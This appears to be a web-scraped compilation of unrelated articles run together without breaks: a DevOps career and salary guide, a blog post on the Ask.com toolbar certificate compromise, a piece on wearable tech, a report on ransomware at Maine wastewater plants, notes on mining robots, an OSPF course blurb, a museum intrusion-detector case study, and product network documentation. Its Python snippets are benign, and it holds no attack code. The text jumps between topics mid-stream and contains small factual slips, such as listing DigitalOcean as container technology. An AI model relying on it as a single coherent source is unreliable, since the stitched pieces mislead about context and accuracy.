What is DevOps?
Traditional software development projects used a compartmentalized mindset. When the need arose for a new piece of software, a company would assemble a team devoted to that application. Once that team created the app, the completed software would be passed to an operations team to manage.
Any updates to the software would require the business to pull together a new team to address them. That often caused friction between the operations team, charged with keeping the platform viable for users, and the development teams focused on getting their changes up and running.
DevOps evolved from the mindset of agile development, which takes a more collaborative and iterative approach to software development. It promotes continuous interactions and feedback between team members and stakeholders as they work to refine and improve a piece of software. Approaching application management from a DevOps perspective makes room for the continuous evolution of a project while promoting the partnership between IT development and operations areas - hence the moniker “DevOps.”
With DevOps, companies gain the ability to standardize how they approach application development while automating the delivery, security, and maintenance of various software products. It’s a way of breaking down the costly silos that often crop up in organizations of all sizes in application development.
How do DevOps Engineers Fit Into an IT Organization?
DevOps engineers facilitate various aspects of development and operations by taking on several roles throughout the process. They make sure the company stays on track to deliver on project goals, and they ensure consistency in code changes and in deployments of new software versions to various environments.
The best DevOps engineers understand how to step back and see the big picture. They also know how to assess individual functions in a process and make them work more efficiently. For example, they may make a recommendation on the tools that testers should use when evaluating the viability of a new web application.
Computer schools offer courses, certificates, and college degree programs featuring the skills you need to become a DevOps engineer. Compare DevOps engineer training programs in the U.S. and online below.
a.k.a. Development Operations Manager | Integration Specialist | Release Manager | Automation Engineer
DevOps Engineer Salaries
Courses and Degrees
DevOps Engineer Certifications
DevOps Engineer Job Outlook
DevOps Engineering Jobs
What are the Responsibilities of a DevOps Engineer?
Good DevOps engineers make software functions appear seamless from the outside. They interpret and execute the needs of developers, managers and other stakeholders and address issues that come up during different project iterations.
DevOps engineers function similarly to IT project managers in many ways. They bridge the gap between the operations team and developers, helping each side understand the role it plays in ensuring successful software project outcomes.
Let’s take a deeper look at some day-to-day tasks of DevOps Engineers:
- Infrastructure Management: DevOps engineers continuously monitor the different functions that go into app development and deployment. They make sure users have the access they need, that databases can scale to meet business demands, and oversee the management of different workflow processes. The role also calls for oversight of testing and automated deployments.
- Security Oversight: DevOps engineers ensure the security and integrity of any software deployed by the company. They look for and resolve any problems that could lead to breaches of confidential business data. DevOps engineers also collaborate with the cyber security team to ensure compliance with existing company protocols.
- Automation Management: Modern DevOps typically involves the use of various automation tools to ensure the smooth delivery of code to different environments. DevOps engineers should understand how to wield automation to eliminate manual processes and add more efficiency to the software development life cycle.
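The automation-management idea above can be sketched in a few lines: a pipeline runner that executes named steps in order and stops at the first failure. The step names and the deliberate failure below are hypothetical stand-ins for real build, test, and deploy commands.

```python
# Toy pipeline runner: run named steps in order, stop on the first failure.
def run_pipeline(steps):
    """Run (name, callable) steps in order; return (succeeded, log)."""
    log = []
    for name, step in steps:
        try:
            step()
            log.append(f"OK   {name}")
        except Exception as exc:
            log.append(f"FAIL {name}: {exc}")
            return False, log  # stop the pipeline on the first failure
    return True, log

# Hypothetical steps standing in for real build/test/deploy commands.
def build():
    pass

def test():
    pass

def deploy():
    raise RuntimeError("target host unreachable")

ok, log = run_pipeline([("build", build), ("test", test), ("deploy", deploy)])
for line in log:
    print(line)
print("pipeline succeeded" if ok else "pipeline failed")
```

In a real setup the callables would shell out to build tools or call deployment APIs, but the control flow, ordered steps with fail-fast behavior, is the same idea an automation tool implements.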
What Skills do DevOps Engineers Need?
A reliable DevOps specialist understands every aspect of the Software Development Life Cycle (SDLC) - the systematic process of planning, developing, testing, deploying, and maintaining a software system. They also need a solid understanding of core DevOps principles and best practices.
Here are some of the most important and marketable skill sets for DevOps engineers:
- Agile Development: DevOps engineers help teams organize work in shorter iterations, called sprints, to get through an increased number of releases. They also help map out the work that teams must complete in upcoming iterations, and incorporate feedback from each version of a software platform to address future issues.
- Continuous Integration (CI): DevOps engineers make sure that new code coordinates properly with an existing codebase. It’s their job to ensure consistency in development and avoid the inclusion of components that would hurt performance and negatively affect users.
- Continuous Delivery (CD): DevOps engineers oversee the continual delivery of new code via testing and automation. They look for ways to remove waste and ensure that code is consistently ready-to-deploy. DevOps engineers should understand how to leverage popular CI/CD tools like Jenkins to manage different aspects of continuous delivery.
- Orchestration: One essential skill often relied upon by DevOps engineers is being able to analyze current practices and look for ways to improve efficiency by removing manual tasks. The orchestration process makes sure any repetitive steps performed by humans get transformed into an automated process to speed up deployments. Such functions include implementing database changes or launching a new web server.
- Source / Version Control: Source control tools, also called version control tools, help DevOps engineers cut down on development time and improve their chances of having successful deployments. These tools facilitate the tracking and storage of any changes to software projects over different periods. Popular source control tools include GitHub, Subversion, AWS CodeCommit, and Microsoft Team Foundation Server.
- Container Management: Containers make it easier for DevOps engineers to set up hosting of different applications in a portable environment. They let you create exact copies of a system required for deployment. Containers are more lightweight than the virtual machines used for this purpose in the past. Examples of popular container technology include Docker, Kubernetes, Microsoft Containers, and DigitalOcean. Using containers helps DevOps engineers ensure consistency across multiple environments.
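To illustrate the version-control item above, here is a toy sketch of the content-addressing idea behind tools like Git: each version of a file is stored under a hash of its content, so any change yields a new identifier while old versions stay retrievable. Git's real object format is more involved; this shows only the core idea.

```python
# Toy content-addressed store: every version of a file is saved under a
# hash of its bytes, so edits create new identifiers and history survives.
import hashlib

store = {}  # maps content hash -> file content (a toy object database)

def commit_blob(content: bytes) -> str:
    """Store content under its SHA-1 hash and return the hash."""
    digest = hashlib.sha1(content).hexdigest()
    store[digest] = content
    return digest

v1 = commit_blob(b"print('hello')\n")
v2 = commit_blob(b"print('hello, world')\n")

print(v1 != v2)    # any edit yields a different hash, i.e. a new version
print(store[v1])   # old versions remain retrievable by their hash
```

This is why version-control tools make rollbacks cheap: nothing is overwritten, so "going back" is just looking up an earlier identifier.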
What Kind of Background Should a DevOps Engineer Have?
Anyone interested in filling the role of a DevOps engineer within an organization should have experience with testing tools, integration technology, automation, and various programming languages. Most DevOps engineers start with a background in IT project management, systems management, database administration, software development, or other IT careers.
DevOps Engineer Salary
Thanks to their significant impact on business processes and the bottom line, DevOps engineers enjoy one of the highest base salaries in the IT job market. The mean annual wage for development operations engineers in the U.S. is $119,000.
Average salaries for DevOps engineers and related job roles:
- DevOps Engineer: $119,000
- Software Developer: $108,366
- Front-End Web Developer: $107,276
- IT Project Manager: $96,509
- Database Administrator: $95,357
- Computer Systems Analyst: $80,787
- Computer Programmer: $76,085
Top paying states for DevOps engineers:
- California: $150,000
- New York: $146,000
- Massachusetts: $140,000
- New Jersey: $135,000
- Washington: $133,000
Sources: Indeed.com | Talent.com
DevOps Engineer Education Requirements
DevOps engineers typically start with an undergraduate degree in software engineering, computer science, or a related information technology field. A degree in mathematics can also provide the foundation needed to progress in DevOps engineering.
Aspiring DevOps engineers should choose a curriculum that allows them to focus on the following disciplines:
- Cloud Architecture: With so many organizations moving toward cloud technology for data and application needs, DevOps engineers should know the basics of cloud architecture. This role will likely require the management of applications and databases on a cloud server. Look for programs that cover topics like cloud computing, database management in the cloud, and serverless architecture.
- System Architecture: DevOps Engineers should understand how to assess and support the entire DevOps pipeline used to support development, testing, and CI/CD processes. That means understanding the flow of all company systems and the impacts various changes have on users in different areas of an organization. Take courses covering topics like distributed system design, software architecture and design, and client-server design. Knowing the ins and outs of data recovery, networking, and memory management is also helpful.
While it’s vital to have the right technical expertise (hard skills), DevOps engineers also need business and communication know-how (soft skills) to succeed in this role.
Here are some of the most desirable soft skills for DevOps engineers:
- Effective team management and leadership
- Clear and precise communication to users across different levels of technical knowledge
- An understanding of company culture and the people using managed software products
- A commitment to quality control to ensure the integrity of the DevOps process
- The ability to provide consistent feedback to developers and other stakeholders
Compare courses and degrees that align with DevOps education requirements.
DevOps Engineer Courses & Degrees
To date, there aren't many college degrees focused expressly on DevOps; however, many programs include coursework in the skills needed to become a DevOps engineer. Here are some courses and degree programs that align well with DevOps engineering.
Bachelor of Science in Cloud Computing & Solutions
- Includes certification preparation for:
- Cisco Certified Network Associate (CCNA)
- Use cutting-edge cloud computing tools to solve real-world business and technology problems
- Create local and hosted virtualization solutions
- Develop secure cloud-based software applications
- Explore the best practices of cloud services management
- Foundational IT skills in networking, systems administration, cybersecurity, computer programming & data management
Bachelor of Science in Computer Science: Software Engineering
- Gain the Skills to Pursue Sought-After Roles in Web and Mobile Application Development
- Full Stack Software Design and Engineering
- Build Systems Architectures to Meet Business Needs
- Design UIs for Embedded, Cloud & Mobile Systems
- Analyze and Design Data Structures & Algorithms
- Cybersecurity Tools & Techniques ft. Secure Coding
Master of Science in Enterprise Networks & Cloud Computing
- Implement Cloud Solutions to Meet Complex Goals
- Design, Manage & Secure Enterprise IT Networks
- Cloud Distribution Systems inc. SaaS, PaaS & IaaS
- Cloud Application Deployment and Operations
- Database, Application and UX Development Training
- Global Network Policy, Regulation & Governance
- Information Technology Project Management
- No GRE or GMAT Exams Required for Admission
Master's in Technology Management
- Prepare for Leadership Roles in Business and Information Technology
- Cloud Computing and Virtual Data Centers
- Business Intelligence and Data Analytics
- Cyber Security Threats & Countermeasures
- Globalization and the Modern IT Workforce
- Computer Systems Analysis Tools & Techniques
- Wield Emerging Technologies and IT Personnel to Achieve Business Goals
- No GRE or GMAT Required for Admission
DevOps Engineer Certifications
DevOps engineers looking to enhance and validate their skills should consider earning certifications in these domains. Certifications show employers your commitment to maintaining and growing your skill set. Keep in mind that every company has its own preference when it comes to a technology stack.
Here are some of the most desirable certifications for DevOps engineers:
- Cloud Development & Architecture: Companies like Amazon and Microsoft offer DevOps engineers the opportunity to obtain highly marketable certifications in Amazon Web Services (AWS), Google Cloud Platform, or Microsoft Azure Cloud.
- Windows/Linux: Many DevOps engineers will find themselves needing to work with and manage both Linux and Windows operating systems. Obtain certifications like the CompTIA Linux+ or Microsoft Certified Solutions Associate (MCSA) to validate your skills on these platforms.
- Cyber Security: Security is an essential aspect of DevOps engineering. DevOps engineers must protect the pipeline from potential data breaches and ensure the security of any new code or technology introduced to the process. A vendor-neutral credential like CSA's Certificate of Cloud Security Knowledge (CCSK) is helpful here.
Job Outlook for DevOps Engineers
The future for DevOps engineers is as bright as the overall prospects for the field of information technology. As long as there are developers creating new projects for companies, there will be a need for those experts who can take a 360-degree view of what’s involved in building, testing, and releasing quality builds to better serve customers.
That view is backed up by the 2019 DevOps Skills Report from the DevOps Institute. The survey found that workforce demand for skilled DevOps engineers to manage code releases was higher than for any other kind of software engineer.
According to the U.S. Bureau of Labor Statistics, the job market for software developers (the closest position to DevOps engineer in the BLS projections) is expected to grow by 19 percent from 2020 through 2030, more than double the 8 percent growth rate projected for all occupations. The DevOps segment should grow even faster.
Lasting success and upward mobility in DevOps mean constantly growing your skill set. There’s always a new technology on the horizon promising to change how we build, release and manage software. It’s up to DevOps engineers to assess the viability of each one and make sure it’s safely incorporated into the current CI/CD model favored by their employer.
DevOps Engineering Jobs
Your DevOps skills and experience may qualify you for a range of lucrative positions. Use the links below to browse and apply to:
- DevOps Engineer jobs
- Software Developer jobs
- Agile Project Manager jobs
- IT Project Manager jobs
- Automation Engineer jobs
- Java Developer jobs
- Cloud Engineer jobs
- Software Engineer jobs
- Database Administrator jobs
- Mobile App Developer jobs
- Web Developer jobs
In the late 90s and early 2000s, most web browsers came with small add-on programs to enhance browsing. Most of these programs were toolbars, which added functionality like search, bookmark management, local weather forecasts and more in an easy-to-access area of the browser. All in all, they were harmless, albeit annoying. That is no longer the case. Ask.com, purveyor of the somewhat well-known Ask.com toolbar, has fallen victim to two very specific and targeted attacks.
The first attack, according to BleepingComputer.com, took place at the end of October. Third-party security vendors detected the attack and alerted the toolbar’s creator, Ask Partner Network (APN). APN quickly flushed the intruders out of their network, but only temporarily. The cybercriminals returned in December, specifically re-infecting the Ask.com toolbar with potentially unwanted programs.
So why are these small, innocuous and potentially unwanted programs (PUPs) bad for end users? Simple: they offer cybercriminals more opportunities to compromise networks and users. They, in the parlance of the cybersecurity industry, expand the attack surface for hackers.
The cybercriminals responsible for this attack managed to compromise APN’s network at least twice. By doing so, they were able to take advantage of the company’s digital certificates—essentially little strips of code proving APN is who they say they are—to push malicious updates to end users. These strips of code essentially act as an I.D. card for companies, allowing them to issue trusted, verified updates for their programs to end users.
Compromised digital certificates can cause a lot of damage. In this case, cybercriminals used the certificates to trick end users into updating their Ask.com toolbar. By doing so, they unknowingly downloaded a corrupted file that enabled the attackers to both unpack a Remote Access Tool/Trojan (RAT) and steal credentials that would allow them to target other computers on the network.
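For context, below is a minimal sketch of the kind of hash check an updater can run before installing a file. The payloads and hash here are hypothetical, and note the caveat: because the attackers held APN's valid signing certificate, their updates would pass legitimate verification checks, which is exactly what makes certificate theft so damaging.

```python
# Minimal integrity check an updater might run before installing a file.
# Payloads and the "published" hash are hypothetical stand-ins.
import hashlib

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

# Pretend this is the downloaded update and the vendor-published hash.
update_payload = b"toolbar-update-v2"
published_hash = sha256_hex(b"toolbar-update-v2")

# An intact download passes the check...
print(sha256_hex(update_payload) == published_hash)   # True

# ...while one tampered with in transit fails it.
tampered = update_payload + b"<injected payload>"
print(sha256_hex(tampered) == published_hash)         # False
```

The check only protects against tampering after the vendor signs or publishes the hash; if attackers can produce updates the vendor itself appears to vouch for, as happened here, the check passes and users are compromised anyway.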
The good news here is that the attack appears to be highly manual in nature. The security report even details typos in the attacker’s code, and suggests that a human—not an automated bot—may be issuing the attack in real-time. This means the attack is slow-moving and unlikely to hit a lot of users at once, giving security firms the time they need to detect the attack.
This does not, however, mean it’s impossible for crooks to pull off. To head off this potential exploit and protect your devices, follow these tips:
- Watch what you install. There are a lot of programs out there that are available for downloading. Do yourself a favor and limit yourself. While most programs are safe, some can pose problems. Only download programs from trusted app stores or directly from developers you trust.
- Stay up to date with updates. Installing updates when they’re available is one of the most sure-fire ways of staying safe online today. Yes, this attack occurred with a bad update, but attacks like this are extremely rare. Install updates when they’re available to ensure the latest security patches are in place.
- Use comprehensive security. Comprehensive security solutions are key to living a safe digital lifestyle. Security suites, like McAfee LiveSafe™, can help protect your devices with the latest, up-to-date security technology, and are essential to cross-device security today.
Follow us to stay updated on all things McAfee and on top of the latest consumer and mobile security threats.
Walking with WiFi.
Wearable technology is allowing us to interweave technology even further into everyday life. In fact, wearable technology is set to transform our lives: from healthcare to gaming and augmented reality. Will we all soon be wearing technology devices? Probably. So it is no wonder that there could be one public WiFi hotspot for every 20 people on Earth by 2018. Without WiFi, wearable technology would not exist.
What is wearable tech?
Wearable technology is absolutely as it sounds: any electronic technology or computers that are incorporated into items of clothing and accessories. Most of us own a smartphone and many have heard of fitness trackers and even smart watches. You guessed it, there is even more out there to explore. Wearable smart rings in the near future perhaps?
The cleverest of these wearable devices can perform most tasks that we might expect from a computer or laptop that is on our desk waiting for us when we arrive at work. Actually, in many cases, wearable tech is even more highly developed and sophisticated. This is because it can be used to scan, track and provide sensory feedback on ourselves, for example biofeedback or physiological functions.
Usually wearable tech communicates in real time
This means that we can get our information instantly from our smart wearable watches, glasses or hearing aid devices. The whole idea of wearable technology is that we can go hands-free, stay online all the time, and enjoy seamless, portable access to the data we need exactly when we need it. As you know, we are getting used to having data presented to us instantaneously.
Examples of wearable tech:
Health tracking devices
These remove any form of ‘denial’ when trying to get fit and healthy – think New Year’s Resolutions! Health trackers are actually classed by some as a type of smart watch as they are worn on the wrist. They basically allow your body to talk to you as you attempt to improve your BMI. Health trackers provide feedback on things such as heart rate, body fat and weight (eeeeek) and even your skin’s electric conductivity. The Simband, for example, is equipped with six sensors that can keep tabs on your daily steps, heart rate, blood pressure, body temperature, and how much sweat your sweat glands are producing.
Listening to your whole body can be important for the maintenance of good health. For example, measuring your GSR (galvanic skin response – or sweat to you and I) can provide an indication of how stressed you are. It could be a great way to identify the situations causing the highest stress response, to warn people suffering from stress-related illnesses, and to highlight which situations are best to avoid. This can be difficult, of course, if stress relates to work or the school run. However, it might also indicate which behaviours lead to the least stress response, and maybe where to go or what to do to reduce the effects of any stressful experiences. All the information can be wirelessly synced to online graphs and statistics to keep you on track with your personal health and fitness goals.
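As a rough illustration of how a tracker might turn raw GSR samples into a stress alert, the sketch below flags any reading that jumps well above a rolling baseline. Real devices use far more careful signal processing; the window size, threshold, and readings here are made up.

```python
# Toy stress detector: flag GSR samples that jump well above a rolling
# baseline. Window size and jump threshold are illustrative assumptions.
def flag_stress(samples, window=3, jump=1.5):
    """Return a True/False flag per sample; True means a suspected spike."""
    flags = []
    for i, s in enumerate(samples):
        if i >= window:
            baseline = sum(samples[i - window:i]) / window
            flags.append(s > baseline * jump)
        else:
            flags.append(False)  # not enough history for a baseline yet
    return flags

gsr = [2.0, 2.1, 2.0, 2.1, 5.0, 2.2]   # microsiemens; the spike is at index 4
print(flag_stress(gsr))
```

A real wearable would smooth the signal, calibrate per user, and combine GSR with heart rate and other sensors, but the core loop of comparing each reading against recent history is the same.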
If total feedback on your body’s health doesn’t sound like quite enough info, then perhaps it’s time to look into a smart watch. Some smart watches will enable you to download all the health and fitness trackers as apps as well as being a small portable computer. This technology effectively lets you get the measure of your whole life.
A smartwatch originally performed what now seem simpler tasks such as calculations, translations, and games. A traditional smart watch still acts as a timekeeping device but also includes the features we expect from our devices today: calls, texts emails and even web-browsing. The earlier smart watches require a paired smartphone, connected wirelessly through Bluetooth to work.
Standalone smart watches now operate on their own, without the need for a paired smartphone, often taking SIM cards just like a cell phone. They include all the functionality of a full-featured smartphone, just in a wearable form where data can be accessed through WiFi. So, nowadays smart watches are like mini wearable computers: they run mobile apps, play media, and some can even take calls like a mobile phone.
Google Glass is a hands-free, optical head-mounted display that communicates with the internet through voice commands. The use of Google Glass has been demonstrated in healthcare and shows how technology can vastly improve patient care. It has already been used to demonstrate surgery as it is happening, educating medical students who can watch the procedures remotely.
Google Glass is great for all types of education. Teachers are being encouraged to create ‘first person’ video guides. Indeed, students themselves could record their interactions with each other, whilst working collaboratively on a piece of work or whilst out in the field. School trips for students can be highly educational but many students won’t be able to afford all the trips offered by their institution. Students could enjoy watching remotely what is going on in real time. This article in the Huffington Post tells us more about uses in education, such as wearing it while training for sports. Students can use real-time instruction and players could record and understand their own movements better, use it to take notes in lectures or even ask questions of the lecturer via text.
Even simply watching sports on TV could be improved. With an app that alerts fans when a game is getting exciting, such as last-minute score changes, games going into extra time, or grand slam tennis finals going to a fifth set, Glass wearers could be pinged so as not to miss anything.
Other industries could benefit too. In manufacturing, for example, Google Glass could have a massive impact because it would allow workers to receive on-the-job training in how to fix equipment.
Where will this all lead? The future of wearable tech
Wearable tech doesn’t necessarily come off as easily as the examples above. There are more invasive versions, such as microchip implants or even smart tattoos – not for the faint-hearted.
What wearable tech will actually be able to do is so far reaching it’s mind blowing. There are obvious benefits in that it has implications in the fields of medicine, health and fitness. In fact, wearable technology is set to transform the health and wellness industry.
And that’s not all…
There is also bound to be a fun aspect to wearable technology and for gamers there is the promise of more realistic gaming environment with augmented reality. Augmented reality combines the real world and some computer generated sensory input, so gamers can become even more immersed online.
It could even be used in retail where you are literally ‘wearing’ the technology. Via virtual mirrors, you can have your body shape scanned and clothes projected onto you as a way of trying on before you buy without actually taking off the clothes you are in.
All that’s left now is to develop a range of aesthetically pleasing designs.
As well as the practicality and function of wearable tech, researchers are also considering design and even fashion. We may start to see wearable technology in our favourite brands of clothing: t-shirts, jackets, headbands and jewelry.
In fact, wearable devices may transform the use of mobile devices altogether in the not so distant future. The potential wearable trends of the future are documented here. The ones to watch out for include solar clothes that can recharge your phone, a tracker to work out where each outfit is in your wardrobe, bike helmets with a built in navigation system (better than using a smartphone whilst cycling along). There are also going to be smart socks that work out if you are making injurious movements whilst running, smart bras that track your heart rate, and even more luxurious clothing that uses technology to enhance the look.
Exciting times for wearable technology. How do you think we should wear it?
Two recent ransomware attacks successfully breached computers at wastewater management plants in the US State of Maine, according to a statement by the state’s Department of Environmental Protection.
While the two cyberattacks, which hit facilities in the towns of Mount Desert and Limestone in the US’s most northeastern state, are believed to have posed no threat to human safety, they were far from benign, and have raised serious concerns about the potential danger to human life created by cybersecurity vulnerabilities present in America’s decentralized critical infrastructure. Even if major essential service providers were to perfect their own cybersecurity operations, large numbers of smaller providers – sometimes functioning on just municipal scales – can still pose serious risks to life, health, safety, and property if they are not adequately protected against cyber threats. Furthermore, because there are not yet any uniform, nationwide, cyber-breach reporting requirements to which either municipalities or wastewater treatment facilities must adhere, nobody truly knows if we, the people of the United States, already have a serious problem. (There is currently legislation in progress in the US Congress that would create some basic, standard governance in this regard.)
While the Limestone Water and Sewer Department breach is alleged to have taken out a single computer running the long-obsolete Windows 7 operating system, which was subsequently replaced with a newer machine (click here to learn more about why you should not run long-obsolete operating systems), the attack on Mount Desert Wastewater apparently took various office computers offline for three days. Like the former attack, however, that breach did not impact any actual wastewater treatment processes, as the equipment that Mount Desert Wastewater utilizes to perform such functions is, according to its superintendent, Ed Montague, “manually controlled with no automated inputs.”
Officials have said that operations at both facilities were fully recovered without paying any ransoms to cyber-criminals, and that no sensitive information was compromised as a result of the breaches.
Yet, the breaches are still of concern, and may foreshadow more sinister attacks in the future, as well as remind us that there may be ongoing, potentially dangerous, attacks about which we do not yet know.
Clearly, while we may have been lucky in Maine in July, unless we do a better job at protecting our critical infrastructure from cyberattacks, it is a matter of when, not if, we will suffer a much more dangerous breach.
As noted by Brian Kavanah, director of the Bureau of Water Quality at the Maine Department of Environmental Protection, cyberattacks on wastewater plants can wreak dangerous havoc by disabling pumps and other equipment or otherwise interrupting the treatment of sewage and other wastewater. Of course, as in most other environments, sensitive data could also be compromised and/or manipulated on computer systems used for managing operations. In short, according to Kavanah, “Cyberattacks on wastewater infrastructure can cause significant harm.”
Let us transform the two recent breaches in Maine into a nationwide wake-up call about the dangers of cyberattacks on any of our huge number of smaller providers of critical infrastructure services – perhaps some of the funds allocated as part of the new infrastructure improvement bill passed by Congress should be utilized to beef up cybersecurity for our existing critical infrastructure.
Robots to Take Over Mining
AI-enabled mining robots, empowered with machine learning algorithms, can detect harmful gases in the mines as well as alert miners to take precautions.
FREMONT, CA: Automation, so far, has been a beneficial addition to many industries. Automation of mining tasks such as mineral detection and excavation using mining robots can bring revolutionary change to the mining industry. As a consequence, mining robots are enabling mining companies to increase their profitability and productivity. From gold to coal, many useful materials are dug out of mines. Mining is not a risk-free job; hence, using robots for the dangerous processes involved in mining has been shown to reduce fatalities.
From helping in the excavation, extraction, and transportation of minerals to monitoring mines, mining robots are transforming the mining industry.
In underground mining, the mined material is transported from the mining cave to the surface. Today, the material is moved by manually operated haulage vehicles, conveyors, or hoisted bins. Manually driving these vehicles and transporting extracted materials to underground loading points or the surface can be hazardous and monotonous. The vehicles used for transporting minerals can be automated, much like AI-enabled self-driving cars, for two primary purposes: improved safety and enhanced efficiency. While transporting extracted minerals, there is often a risk of rockfall, which automated transport vehicles can mitigate. Automated vehicles also significantly reduce labor costs and can work around the clock, increasing efficiency and productivity.
The first task in the process of mining is drilling. Extracting minerals is only possible by drilling into mines. From digging into the mine to creating a tunnel for transporting material from the mined area to the surface, every mining task requires drilling, and the process has now become automated. Semi-automated drilling machines are also available that can drill holes with little manual effort over extended periods, and automated drill machines can bore several meters into the earth.
New Training: OSPF Foundation Concepts
In this 10-video skill, CBT Nuggets trainer Keith Barker covers the fundamental components and functions of OSPF for IPv4, including link-state advertisements (LSAs), normal areas, network types, summarization, and filtering. Gain an understanding of Type 1, Type 2, Type 3, Type 4, and Type 5 LSAs. Watch this new Cisco training.
Learn Cisco with one of these courses:
This training includes:
1.3 hours of training
You’ll learn these topics in this skill:
Introducing OSPF Foundations
Router LSAs (Type 1)
DRs, BDRs, and Others
Network LSAs (Type 2)
ABRs and Summary LSAs (Type 3)
ASBR and External LSA Type 5
Type 4 LSAs
OSPF Full Adjacencies
A Brief Introduction to OSPF
OSPF is a core routing protocol. It is used primarily within autonomous systems and, as such, is a basis on which IP routing is performed. OSPF is a foundational concept that aspiring network admins need to understand, in the same way that system integrators need to understand how a BIOS works.
OSPF stands for Open Shortest Path First. That name offers a big clue about what this protocol does. OSPF uses a special algorithm, Dijkstra's Shortest Path First algorithm, for locating the shortest available path between point A and point B in a network. Once that path is identified, networking equipment will use it to route traffic through the network.
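To make the idea concrete, here is a minimal sketch of Dijkstra's shortest-path computation in Python, run on a small, made-up router topology with hypothetical link costs. (A real OSPF router computes a full shortest-path tree from its link-state database; this sketch only returns the cost of one best path.)

```python
import heapq

def shortest_path_cost(graph, source, target):
    """Dijkstra's algorithm: minimum total cost from source to target.

    graph maps each node to a dict of {neighbor: link_cost}.
    """
    dist = {source: 0}
    heap = [(0, source)]
    visited = set()
    while heap:
        cost, node = heapq.heappop(heap)
        if node in visited:
            continue
        visited.add(node)
        if node == target:
            return cost
        for neighbor, link_cost in graph.get(node, {}).items():
            new_cost = cost + link_cost
            if new_cost < dist.get(neighbor, float("inf")):
                dist[neighbor] = new_cost
                heapq.heappush(heap, (new_cost, neighbor))
    return float("inf")  # target unreachable

# A small, made-up topology: routers A-D with OSPF-style link costs.
topology = {
    "A": {"B": 1, "C": 4},
    "B": {"C": 2, "D": 5},
    "C": {"D": 1},
    "D": {},
}
print(shortest_path_cost(topology, "A", "D"))  # 4, via A->B->C->D
```

Note that the "cheapest" path (A->B->C->D, cost 4) has more hops than the direct alternatives; cost, not hop count, is what the algorithm minimizes.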
Though OSPF is a common protocol, its implementation differs slightly between IPv4 and IPv6 networks: IPv4 uses OSPFv2, while IPv6 uses OSPFv3.
It's important to note that though OSPF will attempt to use the shortest network path for routing traffic, this may not always be the case for software-defined networks. In theory, the shortest path is typically the fastest. Software-defined networks build on that idea but instead send traffic through the fastest available path. Sometimes the shortest path includes delays that incur too much latency, in which case a software-defined network may opt for a longer path that offers faster routing.
A World Heritage Site, the mausoleum of China's first emperor, guarded by these clay warriors, now has powerful fail-safe detectors that alert staff to the entry of thieves and possible damage to the sculptures.
The Mausoleum of Emperor Qin Shi Huang, a UNESCO World Heritage Site located in Xi'an (China), houses a 2,000-year-old army of clay statues, the Terracotta Warriors, which guard the tomb of China's first emperor.
The museum's intruder detection system had become obsolete, so one of the priorities was to update it while addressing several key security challenges. One of these, until the arrival of the pandemic, was responding to thousands of visitors a day with a fast, fail-safe alarm system that triggers whenever the exhibits are in danger.
In addition to the constant risk of thieves trying to steal exhibited items, the biggest threat comes from tourists: mobile phones and cameras dropped into the pits, entry into restricted areas, and the damage these can cause.
Another challenge was that the new solution had to work in extreme conditions, since the pits, which house several thousand clay warrior statues, contain large amounts of dust that can impede the detectors. Finally, the system had to be discreet, without interfering with the experience of observing the life-size warrior and horse statues.
To meet these challenges, Bosch experts deployed a combination of several hundred intrusion detectors across the 16,300 m² museum area. To achieve rapid detection of security breaches, wall-mounted detectors were installed along the pits, complemented by ceiling-mounted detectors above the visitor walkways and the open areas.
The detectors, integrated into the manufacturer's G Series control panels, operate with microwave and infrared technologies, enhanced by First Step Processing (FSP) algorithms to detect changes in infrared energy when a person crosses a predefined safety limit inside the museum or along the perimeter.
To eliminate false alarms caused by dust and other environmental interference, the pit detectors use a pyroelectric infrared (PIR) sensor and adaptive microwave noise-processing technology.
One differentiating feature is that the sensors provide accurate intrusion detection even though they are mounted on the museum's vaulted, raised roof. Specifically, the roof is 4.8 m high, exceeding the limits of standard ceiling detectors by more than 2 m.
In the event of an intrusion attempt, Bosch's G Series control panels trigger an alarm in the museum's control room in just two seconds. In addition to the exact location of the detector, the security team receives real-time images of the scene from a surveillance camera, thanks to the integration of a third-party video security platform, for a quick and effective response.
The integrated security system also meets another key requirement for the museum's operators: since a large proportion of the exhibited pieces are stored elsewhere when not on display, and must likewise be safe from thieves, Bosch detectors protect these storage facilities as well.
This use of detectors not only saves the cost of surveillance personnel for these spaces, which are protected from intrusion and damage, but also lets visitors enjoy a personal experience, viewing the ancient objects without fences or barriers limiting their route.
The architecture of the product is network-neutral and therefore helps administrators facilitate application control in computers that have Microsoft Windows installed in them, irrespective of their network setup. Your network setups can include the following:
If you have a Windows Active Directory-based network, you can install the Central Server in a single location for centralized management all the computers within the Active Directory. For more information, see Architecture for LAN.
If you have a workgroup-based network, you can manage the computers in the workgroup from a central location. You should ensure that all the computers have a common set of credentials. For more information, see Architecture for LAN.
The WAN architecture helps you to manage Windows computers that span across multiple locations. These computers can be connected using a Virtual Private Network (VPN) or through the Internet. When computers in different locations are connected using the Internet, the Central server should be installed and configured as an edge device. This means that the designated port should be accessible through the Internet. You need to adopt necessary security standards to harden the operating system where the Central server is installed.
You must open the following Web ports in the server:
For more information, see Architecture for WAN.
You can manage the computers of mobile or roaming users who connect to your network using a VPN connection or through the Internet. The agent installed on their computers periodically contacts the Central server installed in your network, gathers the necessary instructions, and executes them. It also updates the data and status information in the Central server. For more information, see Manage Roaming Users.
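The check-in cycle described above can be sketched as a simple polling loop. The function names and the simulated task queue below are illustrative stand-ins; the product's actual agent protocol is proprietary and not shown here:

```python
import time

def agent_poll_cycle(fetch_instructions, execute, report_status, cycles=3, interval=0.0):
    """Sketch of a roaming agent's periodic check-in loop.

    fetch_instructions() returns the pending tasks from the central server,
    execute(task) runs one task locally, and report_status(results) uploads
    the outcome. All three are stand-ins for the real agent protocol.
    """
    history = []
    for _ in range(cycles):
        tasks = fetch_instructions()          # contact the central server
        results = [execute(t) for t in tasks] # run instructions locally
        report_status(results)                # update status on the server
        history.extend(results)
        time.sleep(interval)                  # wait until the next check-in
    return history

# Simulated server queue and agent behavior.
queue = [["update-policy"], [], ["scan-disk"]]
fetch = lambda: queue.pop(0) if queue else []
reported = []
history = agent_poll_cycle(fetch, lambda t: f"{t}: done", reported.extend)
print(history)  # ['update-policy: done', 'scan-disk: done']
```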
Computers across multiple domains can be managed if the multiple domains are set up in the following ways:
The computers within the same domain or workgroup should have a common set of credentials irrespective of the domains they are combined with. For more information, see Architecture for WAN and Architecture for LAN.
*Refers to Active Directory, workgroups or other directory-based networks
